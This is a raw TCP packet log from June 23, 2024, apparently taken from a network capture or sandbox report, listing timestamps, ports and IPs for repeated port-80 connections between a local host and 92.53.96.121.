Jun 23, 2024 06:54:46.014019012 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.014031887 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.014045954 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.014058113 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.014074087 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.014087915 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018505096 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018560886 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018718004 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018771887 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018801928 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018815994 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018840075 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018852949 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018868923 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018887043 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018891096 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018903017 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018932104 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018943071 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.018946886 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.018990993 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.019193888 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.019252062 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.019293070 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.019342899 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.019345999 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.019388914 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.019399881 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.019453049 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023358107 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023421049 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023576021 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023631096 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023758888 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023775101 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023797989 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023817062 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023822069 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023834944 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023859978 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023864985 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023879051 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.023899078 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.023917913 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.024017096 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024065971 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.024099112 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024111986 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024135113 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024147034 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024147987 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.024171114 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024183989 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.024195910 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028074980 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028101921 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028162956 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028175116 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028217077 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028229952 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028254986 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028268099 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028289080 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028301954 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028325081 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028337955 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028420925 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028434038 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028498888 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028523922 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028547049 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028558969 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028623104 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028686047 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028795004 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028808117 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028851986 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028863907 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028887987 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028899908 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028915882 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028973103 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.028985977 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029000044 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029011965 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029023886 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029036045 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029047966 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029071093 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029083014 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029104948 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029117107 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029170990 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029182911 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029195070 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029220104 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029232025 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029246092 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.029257059 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.629122019 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.677145958 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.943201065 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.943981886 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.948748112 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:48.948837996 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.948957920 CEST	80	49755	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:48.949052095 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.949148893 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:48.953917980 CEST	80	49755	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:48.954091072 CEST	80	49755	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:49.637916088 CEST	80	49755	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:49.692795038 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.646467924 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.647294044 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.651818991 CEST	80	49755	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:54.651911974 CEST	49755	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.652098894 CEST	80	49756	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:54.652179003 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.652283907 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:54.657114983 CEST	80	49756	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:54.657269955 CEST	80	49756	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:55.365262032 CEST	80	49756	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:55.411623955 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.380898952 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.381623983 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.386441946 CEST	80	49756	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:00.386471033 CEST	80	49758	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:00.386514902 CEST	49756	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.386580944 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.386689901 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:00.391438961 CEST	80	49758	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:00.391617060 CEST	80	49758	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:01.087023973 CEST	80	49758	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:01.130325079 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.099478006 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.100236893 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.104922056 CEST	80	49758	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:06.105009079 CEST	49758	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.105093002 CEST	80	49759	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:06.105166912 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.105329037 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:06.110177994 CEST	80	49759	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:06.110255003 CEST	80	49759	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:06.796613932 CEST	80	49759	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:06.849199057 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.802581072 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.803276062 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.807912111 CEST	80	49759	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:11.808001995 CEST	49759	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.808079004 CEST	80	49760	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:11.808156967 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.808259964 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:11.813123941 CEST	80	49760	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:11.813184023 CEST	80	49760	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:12.501444101 CEST	80	49760	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:12.552208900 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.505937099 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.506745100 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.511255026 CEST	80	49760	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:17.511302948 CEST	49760	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.511637926 CEST	80	49761	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:17.511708021 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.511843920 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:17.516582012 CEST	80	49761	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:17.516671896 CEST	80	49761	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:18.221051931 CEST	80	49761	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:18.270950079 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.224574089 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.225234032 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.353513956 CEST	80	49762	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:23.353626966 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.353847027 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.354373932 CEST	80	49761	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:23.357274055 CEST	49761	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:23.358619928 CEST	80	49762	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:23.358767033 CEST	80	49762	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:24.045906067 CEST	80	49762	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:24.099126101 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.052716017 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.053548098 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.058203936 CEST	80	49762	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:29.058311939 CEST	49762	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.058470011 CEST	80	49763	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:29.058564901 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.058640003 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:29.063513994 CEST	80	49763	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:29.063566923 CEST	80	49763	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:29.763211966 CEST	80	49763	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:29.817966938 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.771321058 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.771985054 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.776515961 CEST	80	49763	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:34.776580095 CEST	49763	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.776774883 CEST	80	49764	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:34.776849031 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.777014017 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:34.781918049 CEST	80	49764	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:34.781929016 CEST	80	49764	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:35.485198021 CEST	80	49764	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:35.536673069 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.490246058 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.490729094 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.495404005 CEST	80	49764	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:40.495480061 CEST	80	49765	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:40.495536089 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.495537043 CEST	49764	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.495696068 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:40.500648022 CEST	80	49765	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:40.500739098 CEST	80	49765	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:41.188306093 CEST	80	49765	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:41.239837885 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.193212986 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.197204113 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.198457003 CEST	80	49765	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:46.198525906 CEST	49765	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.202054024 CEST	80	49766	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:46.202116966 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.202213049 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:46.207005978 CEST	80	49766	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:46.207159996 CEST	80	49766	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:46.913162947 CEST	80	49766	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:46.958589077 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:51.927681923 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:51.928374052 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:52.191688061 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:52.191873074 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:52.191972017 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:52.195825100 CEST	80	49766	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:52.195888042 CEST	49766	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:52.196765900 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:52.196954966 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:52.884943008 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:52.927278996 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:53.102534056 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:53.106182098 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.897108078 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.897200108 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.902223110 CEST	80	49768	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:57.902657986 CEST	80	49767	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:57.906219006 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.906219006 CEST	49767	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.906275988 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:55:57.911231041 CEST	80	49768	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:57.911245108 CEST	80	49768	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:58.653141022 CEST	80	49768	92.53.96.121	192.168.2.4
Jun 23, 2024 06:55:58.708551884 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.662017107 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.662779093 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.808650970 CEST	80	49769	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:03.808783054 CEST	80	49768	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:03.808964014 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.808964968 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.808979988 CEST	49768	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:03.813889027 CEST	80	49769	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:03.814052105 CEST	80	49769	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:04.500912905 CEST	80	49769	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:04.552256107 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.505872011 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.510174990 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.511141062 CEST	80	49769	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:09.513925076 CEST	49769	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.515044928 CEST	80	49770	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:09.516735077 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.516839981 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:09.521680117 CEST	80	49770	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:09.521785021 CEST	80	49770	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:10.222587109 CEST	80	49770	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:10.271013975 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.226130009 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.226130962 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.231321096 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:15.231818914 CEST	80	49770	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:15.232013941 CEST	49770	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.232039928 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.232300043 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:15.237858057 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:15.238358021 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:16.951023102 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:16.951039076 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:16.951045990 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:16.951052904 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:16.951219082 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:16.951219082 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:16.951219082 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.960304022 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.960321903 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.965306997 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:21.965631008 CEST	80	49771	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:21.968379974 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.968394995 CEST	49771	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.968521118 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:21.973345041 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:21.973397017 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:22.679023981 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:22.724191904 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:22.924010992 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:22.924067974 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.693572044 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.694274902 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.699199915 CEST	80	49772	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:27.699430943 CEST	80	49773	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:27.699554920 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.699584007 CEST	49772	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.699659109 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:27.704554081 CEST	80	49773	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:27.704664946 CEST	80	49773	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:28.389945030 CEST	80	49773	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:28.442941904 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.399096012 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.399096012 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.404134035 CEST	80	49774	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:33.404278040 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.404398918 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.404587030 CEST	80	49773	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:33.405673981 CEST	49773	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:33.409205914 CEST	80	49774	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:33.409295082 CEST	80	49774	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:34.093904018 CEST	80	49774	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:34.143570900 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.100300074 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.100312948 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.105525970 CEST	80	49775	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:39.105695963 CEST	80	49774	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:39.105813980 CEST	49774	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.105818987 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.105926991 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:39.111011982 CEST	80	49775	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:39.111032963 CEST	80	49775	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:39.836620092 CEST	80	49775	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:39.882253885 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:44.849716902 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:44.850965023 CEST	49776	80	192.168.2.4	92.53.96.121
